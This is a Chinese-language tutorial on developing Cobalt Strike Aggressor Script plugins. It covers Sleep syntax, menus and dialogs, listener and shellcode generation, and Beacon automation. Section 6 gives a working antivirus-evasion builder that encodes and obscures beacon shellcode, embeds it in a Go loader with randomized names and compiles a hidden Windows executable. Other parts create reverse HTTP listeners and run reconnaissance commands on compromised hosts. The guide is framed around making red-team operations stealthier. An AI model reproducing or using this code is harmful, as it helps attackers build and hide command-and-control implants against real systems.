cs插件开发
字数 1082 2025-08-27 12:33:37
Cobalt Strike Aggressor Script 开发指南
1. 简介
Aggressor Script (简称agscript)是Cobalt Strike 3.0+版本中内置的脚本语言,基于Raphael Mudge的Sleep语言的二次开发。它允许用户扩展和自定义Cobalt Strike的功能。
1.1 相关资源
- Sleep语言手册: http://sleep.dashnine.org/manual/
- Aggressor Script官方文档: https://trial.cobaltstrike.com/aggressor-script
- 函数参考: https://trial.cobaltstrike.com/aggressor-script/functions.html
1.2 脚本控制台
通过View > Script Console可以进入agscript控制台,用于跟踪、配置、调试和管理脚本。
2. Sleep语言基础
2.1 基本语法
- 语句之间必须有空格:
$y = 3(正确) vs$y=3(错误) println和warn函数:warn输出包含文件名和行号,便于调试
2.2 变量类型
$x = "Hello World"; # 字符串
$y = 3; # 数字
$z = @(1, 2, 3, "four"); # 数组
$a = %(a => "apple", b => "bat", c => "awesome language", d => 4); # 字典
2.3 数组操作
# 遍历数组
foreach $index ($data) {
println($index);
}
# 添加元素
add($a, "wYYYYYYYYYYYYYYYYYYYYYYYY", -1); # 在指定位置添加
# 删除元素
remove($a, -1, "data"); # 需要指定删除的内容
2.4 字典操作
# 遍历字典
foreach $data (keys(%z)) {
println("$data =>".%z[$data]);
}
foreach $key => $value (%z) {
println("$key => $value");
}
# 删除键
removeAt(%a, "data"); # 删除单个键
removeAt(%a, "data", "data2"); # 删除多个键
2.5 字符串操作
# 字符串插值
println("\$a is: $a and \n\$x joined with \$y is: $x $+ $y");
# 字符串拼接
$a = "data"."data";
# 字符串替换
$a = replace($a, "data", "Fk");
# 获取字符串长度
println(strlen($data));
# 获取子字符串
println(substr($data, 0, 3));
# 字符串分割为数组
$b = split('.', $a);
# 数组连接为字符串
println(join("ape", "bat", "cat", "dog"));
# 字符串包含判断
if ($str in $data) {
println(111);
}
2.6 函数定义
sub addTwoValues {
println($1 + $2);
}
addTwoValues("3", 55.0);
# 函数引用
$addf = &addTwoValues;
[$addf : "3", 55.0]; # 调用函数引用
2.7 条件判断
# 数字比较
== != < > <= >=
# 字符串比较
eq ne lt gt isin iswm
2.8 循环
sub range {
return lambda({
return iff($begin <= $end, $begin++ - 1, $null);
}, $begin => $1, $end => $2);
}
on ready {
foreach $value (range(1, 10)) {
println($value);
}
closeClient();
}
2.9 文件操作
# 逐行读取文件
$handle = openf("/etc/passwd");
while $text (readln($handle)) {
println("Read: $text");
}
closef($handle);
# 一次性读取文件
$handle = openf("/path/to/key.pem");
$keydata = readb($handle, -1);
closef($handle);
# 写入文件
$handle = openf(">data.txt");
println($handle, "this is some data.");
closef($handle);
# 二进制写入
$handle = openf(">out.txt");
writeb($handle, $data);
closef($handle);
3. Cobalt Strike 开发
3.1 事件管理
on ready {
show_message("welcome 老铁666");
}
3.2 控制台文本颜色
# 使用\cX设置颜色,\U添加下划线,\o重置
println("\c1Red Text\o Normal Text");
3.3 命令快捷键
command test {
println("value: $1");
}
3.4 快捷键绑定
bind Ctrl+H {
show_message("DIO");
}
3.5 菜单项
popup help {
item("&blog", { url_open("https://www.google.com"); });
menu "&game" {
item("&4399", { url_open("https://www.4399.com/"); });
}
}
menubar("新菜单项","new");
3.6 对话框
menubar("新菜单项","new");
popup new {
item("&dialog", { dialogtest(); });
}
sub dialogtest {
$dialog = dialog("dialogTest", %(listener => "", bid => "1", bit => false, str => "string", file => ""), &callback);
dbutton_action($dialog, "submit");
dialog_description($dialog, "dialog 测试");
drow_listener($dialog, "listener", "选择监听器");
drow_checkbox($dialog, "bit", "x64: ", "使用64位的payload");
drow_beacon($dialog, "bid", "Session: ");
drow_text($dialog, "str", "输入文本");
drow_file($dialog, "file", "Choose: ");
dialog_show($dialog);
}
sub callback {
println("dialog $1");
show_message("Pressed $2 传入参数 $3");
}
3.7 文件保存对话框
command file {
prompt_file_save("111", {
println($1);
local('$handle');
$handle = openf("> $+ $1");
println($handle, "I am content");
closef($handle);
});
}
4. Beacon之外的操作
4.1 监听器管理
# 创建监听器 (4.0+)
listener_create_ext("111", "windows/beacon_http/reverse_http", %(host => "127.0.0.1", port => 80, beacons => "127.0.0.1"));
# 获取监听器信息
command list {
foreach $listener (listeners()) {
println("name: $listener");
$data = listener_info($listener);
foreach $key => $value (%data) {
println("$key => $value");
}
println("");
}
}
4.2 Shellcode生成
command shellcode_create {
$listenname = $1;
$handle = $2;
$arch = $3;
if((strlen($listenname) > 0) && (strlen($handle) > 0) && (strlen($arch) > 0)) {
println("Arch: $arch");
println("listen name: $listenname");
println("handle: $handle");
$data = shellcode($listenname, $handle, $arch);
$dk = openf(">shellcode.bin");
writeb($dk, $data);
closef($dk);
println("create shellcode.bin sucess");
} else {
println("shellcode_create <listenname> <remote_host> <arch>");
}
}
4.3 生成可执行文件
command exe {
$data = artifact("ttt", "exe", "x64");
$handle = openf(">out.exe");
writeb($handle, $data);
closef($handle);
}
5. Beacon操作
5.1 Beacon信息
command info {
foreach $beacon (beacons()) {
println($beacon);
println(beacon_info($beacon['id'], "computer"));
}
}
5.2 命令别名
alias w {
bshell!($1, "whoami");
}
5.3 新Beacon初始化
beacon_initial {
bsleep($1, 3, 0);
binput($1, "shell whoami");
}
5.4 右键菜单
popup beacon_bottom {
item "query user" {
prompt_text("Query User", "administrator", lambda({
bshell(@ids, "net user ".$1);
}, @ids => $1));
}
menu "test" {
item "query user" {
prompt_text("Query User", "administrator", lambda({
bshell($ids, "net user ".$1);
}, $ids => $1));
}
}
}
5.5 文件上传
bupload $beacon_id $local_file_path;
5.6 批量Note操作
popup beacon_bottom {
item "&Note2" {
println($1[0]);
local('$note');
$note = beacon_info($1[0], "note");
println($note);
prompt_text("Set Beacon Note2:", $note, lambda({
mynote($bids, $1);
}, $bids => $1));
}
}
sub mynote {
$bids = $1;
$note = $2;
$bid = @();
foreach $entry (beacons()) {
$com = beacon_info($bids[0], 'computer');
$user = beacon_info($bids[0], 'user');
if ($com eq $entry['computer'] && $user eq $entry['user']) {
add($bid, $entry['id']);
}
}
beacon_note($bid, $note);
}
6. 免杀技术示例
6.1 Go语言条件触发免杀
menubar("免杀","bypass");
popup bypass {
menu "&shellcode加载" {
item("&go(条件触发)", {
Generator();
});
}
}
sub Generator {
$dialog = dialog("title", %(listener => "", bit => false, url => ""), &build);
dbutton_action($dialog, "submit");
dialog_description($dialog, "该插件用于快速生成免杀的可执行文件");
drow_listener($dialog, "listener", "Listener: ");
drow_checkbox($dialog, "bit", "x64: ", "使用64位的payload");
drow_text($dialog, "url", "dizhi");
dialog_show($dialog);
}
sub build {
if ($3["bit"] eq "false") {
$system = "x86";
$arch = "386";
} else {
$system = "x64";
$arch = "amd64";
}
$code = base64_decode("go文件base64");
$shell_code = shellcode($3["listener"], false, $system);
$b64shell_code = base64_encode($shell_code);
# 替换特殊字符
$b64shell_code = replace($b64shell_code, 'A', '#');
$b64shell_code = replace($b64shell_code, 'H', '!');
$b64shell_code = replace($b64shell_code, '1', '@');
$b64shell_code = replace($b64shell_code, 'T', ')');
# 替换模板中的占位符
$code = replace($code, "your base64shellcode", $b64shell_code);
$code = replace($code, '\{url\}', $3["url"]);
# 生成随机变量名
$string1 = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
$string2 = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
$KEY_2 = charAt($string1, rand(52)).charAt($string2, rand(62));
# ... 生成更多随机变量名
# 替换模板中的变量
$code = replace($code, '\{2\}', $KEY_2);
# ... 替换更多变量
# 生成构建命令
prompt_file_save("aabbcc.exe", {
$path = "$1";
if ("*Windows*" iswm systemProperties()["os.name"]) {
$path = replace($path, "/", "\\");
$build = "//go:generate cmd /c set GOOS=windows&& set GOARCH=$+ $arch $+ && go build -o $path -ldflags \"-w -s -H=windowsgui\" C:\\\\windows\\\\temp\\\\temp.go && del C:\\\\windows\\\\temp\\\\temp.go";
$gofile = "C:\\\\windows\\\\temp\\\\temp.go";
$handle = openf("> $+ $gofile");
} else {
$build = "//go:generate bash -c \"GOOS=windows&& GOARCH=$+ $arch && go build -o $path -ldflags \"-w -s -H=windowsgui\" /tmp/temp.go && rm /tmp/temp.go\"";
$gofile = "/tmp/temp.go";
$handle = openf("> $+ $gofile");
}
$code = replace($code, '\{GONERATE\}', $build);
writeb($handle, $code);
closef($handle);
$space = " ";
exec("go generate $+ $space $+ $gofile");
show_message("save to $+ $1");
});
}
7. 总结
本指南涵盖了Cobalt Strike Aggressor Script开发的各个方面,从基础语法到高级功能。关键点包括:
- Sleep语言基础:变量、数组、字典、字符串操作、函数和控制结构
- Cobalt Strike集成:事件处理、菜单、对话框和快捷键
- Beacon操作:信息获取、命令执行和文件管理
- 监听器和payload生成
- 免杀技术实现
通过掌握这些技术,您可以扩展Cobalt Strike的功能,创建自定义工具和自动化工作流程,提高红队操作的效率和隐蔽性。